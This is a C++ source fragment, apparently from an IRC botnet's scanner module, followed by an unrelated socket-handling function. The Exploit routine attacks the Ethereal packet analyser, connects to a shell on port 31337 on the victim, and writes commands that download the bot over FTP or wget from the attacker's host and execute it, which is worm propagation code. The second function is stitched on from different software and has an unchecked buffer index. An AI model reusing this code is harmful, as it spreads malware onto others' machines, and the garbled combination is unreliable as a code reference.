bool CScannerEthereal::Exploit() {
if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false;
// We need root to exploit this cause we need to spoof packets
if(getuid()) return false;
ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3);
CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) {
CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000);
sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n");
sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
sShellSocket.Disconnect(); return true; } else return false; }
void ProcessConnection()
{
char buf[1024];
int n = m_socket->Recv(buf, sizeof(buf));
buf[n] = 0;
char *s = FetchURL(buf);
if (!strncmp(s, "/fav/list/", 10))
{
SendList();
} else
if (!strncmp(s, "/fav/open/", 10))
{
OpenContact(s);
}
mir_free(s);
m_socket->Close();
}
